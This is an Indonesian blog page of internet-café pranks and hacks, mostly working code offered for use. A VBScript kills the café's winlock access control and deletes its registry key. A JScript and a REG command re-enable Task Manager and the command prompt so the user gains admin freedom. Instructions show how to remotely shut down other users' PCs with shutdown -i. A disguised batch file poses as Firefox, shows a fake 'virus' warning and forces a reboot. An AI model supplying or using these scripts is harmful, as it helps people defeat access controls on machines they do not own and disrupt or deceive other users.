Iseng di warnet

Kalo blom tau search aja di google yah..

Ya intinya sih winlock itu digunakan buat mengurangi akses kita terhadap komputer tersebut.

Misalkan, gak bisa download atau gak bisa buka Drive di komputer tersebut.

Contohnya aja Net E*ph*ria / L*ghT*o Net di Jalan Kampus Anggrek-Syahdan.

Dan Masih banyak lagi warnet-warnet yang menggunakan aplikasi ini.

Disini saya cuma mau sharing aja pengalaman saya menjadikan diri sebagai admin winlock tersebut. Jiahahahah.

Sebenernya sudah saya tulis di website pribadi / blog saya, Cuma gak ada salahnya kan buat sharing disini ? heheheh..

OK. Yang dibutuhin cuma 1. Notepad / Wordpad.

ikirkan gimana caranya buat buka notepad tersebut. Banyak caranya.

Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak.

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next

Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”/;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”/;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”/;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

http://www.facebook.com/topic.php?uid=73207153377&topic=12760

Iseng Di Warnet

jadi tukang iseng emang seru tapi smuanya bakal bikin dongkol kalau kita yang jadi korban/admin.
ini cuma cara iseng aja yang suka gue pake klau lagi maen di warnet.
gak perlu sungsah sungsah (susah-susah) bawa program remote ke sayangan lo pake aja di bawah windows.

1. Buka windows command processor lo.klick Start -> Run lalau ketik : cmd
2. Pada command prompt, ketik : Shutdown -i terus tkan enter.
3. Perintah tersebut bakal membuka kontak dialoge remote shutdown.PERHATIKAN :
Screenshot :

i494.photobucket.com/albums/rr302/PERISTA_CYBER/Untitled-1-11.jpg

4. Klick tombol Add untuk memasukan IP ADDRESS atau nama komputer target.
Lo bisa milih aksi, shutdown, Log Off, atau Restart.Pada kolom DISPLAY WARNING FOR lo bisa nentukan berapa lama countdown yang akan di tampilkan sebelum komputer Shutdown/log off/restart.Pada opsi planed ada pesan otomatis yang bisa lo pilih.Pada colom comment, lo bisa tuliskan pesan lo untuk sang penyusup. entah ledekan,makian atau apa lah terserah lo sendiri ( gue gak mau tanggung pesan apa yang lo kirim ke korban lol! )
5. Klick Ok. Sesdudahnya di komputer target.

Di komputer korban nanti akan muncul pesan yang lo buat/kirim ke dia.dan waktu yang lo tentuin buat si korban.Selamat mencoba menjadi penyusup iseng ala Z0MB13

NB : corry gak ada pripiyu buat di komputer korban.

http://z0mb13.do.am/publ/1-1-0-8

Cara iseng ngerjain temen di facebook – Nah salah satu cara buat ngerjain akun facebook orang, kita bisa membuat sebuah virus facebook. Istilah tepatnya sih bukan virus ini hanya menggunakan program notepad dengan sedikit kreativitas yang bakal membuat facebookers langsung shock dan kaget dengan apa yang mereka lihat.. Gimana sih cara buatnya ? This is simple .

How to make a fake facebook virus – method

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter
2. Copy kode ini dan pastekan di notepad kamu

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut
5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file .bat yang kamu simpen tadi, misal tadi kamu save pada dekstop
6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya sebagai tipuan aja)
7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?
Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon :)
Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. what will happen ? hahhaha ..

Ini sedikit screenshot yang bakal terjadi saat low ngeclik file .bat yang telah di modif jadi mozilla tadi :

cara buat virus facebook

hack facebook

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: